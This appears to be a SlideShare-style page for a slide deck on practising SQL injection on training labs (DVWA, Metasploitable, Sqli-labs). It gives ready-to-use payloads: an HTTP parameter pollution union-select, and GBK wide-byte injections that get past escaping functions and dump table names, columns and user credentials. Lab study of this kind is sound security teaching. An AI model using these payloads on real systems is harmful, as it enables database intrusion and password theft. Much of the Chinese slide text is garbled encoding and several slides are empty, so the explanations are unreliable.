Sql injection
?Download as PPTX, PDF?
0 likes?43 views
1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms. 2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36. 3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().
Sql injection
- 2. ?Metasploitable ?Dvwa 議 SQL-INJECTION ?Sqli-labs議 SQL-INJECTION ?HPP ?忖廣秘 ? @^ Preg_place() ? @^ addslashes 1/2/2021 1
- 3. 1/2/2021 2 ? Linux Based-Vulnerability machine 書爺v欺議喘殻塀
- 4. 1/2/2021 3 ? Damn Vulnerable Web Application https://hackmd.io/@jeff14994/ByWjCHPII#/
- 5. 1/2/2021 4 ? Sqli-Injection 息挟議 Application OS: 認f音勣委 Sqli-Labs 屁栽欺 Metasploitable´
- 7. 1/2/2021 6 https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf POST & GET 脅頁盾裂念匯
- 8. 1/2/2021 7 Sqli-labs Less-29/Login.php tomcat 恬 WAF apache タ sql 臥
- 10. 1/2/2021 9 Less-29/Login.php Payload: ?id=1&id=-1' union select 1,database(),3--+
- 11. 1/2/2021 10 Sqli-labs MySQL -> 聞喘 GBK (忖)エar忖蚋h忖 - 聞喘 %df 郭渠 %df%27 %df%5c%27 addslash GBK エa \%27 誼欺 `
- 12. 1/2/2021 11 Less-32/index.php -> preg_replace() Sqli-labs
- 13. 1/2/2021 12 Less-33/index.php -> @^ addslashes() Sqli-labs
- 14. 1/2/2021 13 Less-36/index.php -> @ my_real_escape_string() Sqli-labs
- 15. 1/2/2021 14 Less-32/index.php Less-33/index.php Less-36/index.php Payload: 卯 Table ?id=-1%df' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=(select database())), 3--+ 卯 Column ?id=-1%df' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1)), 3--+ 卯犯檻 ?id=-1%df' union select 1, (select group_concat(username,0x3a,password) from users),3--+ 0x3a 燕丹
- 16. 1/2/2021 15 Sql-injection 恷y議仇圭壓孀廣秘c 光N幃zRE孀 Server 議指
- 17. 1/2/2021 16
- 18. 1/2/2021 17
- 19. 1/2/2021 18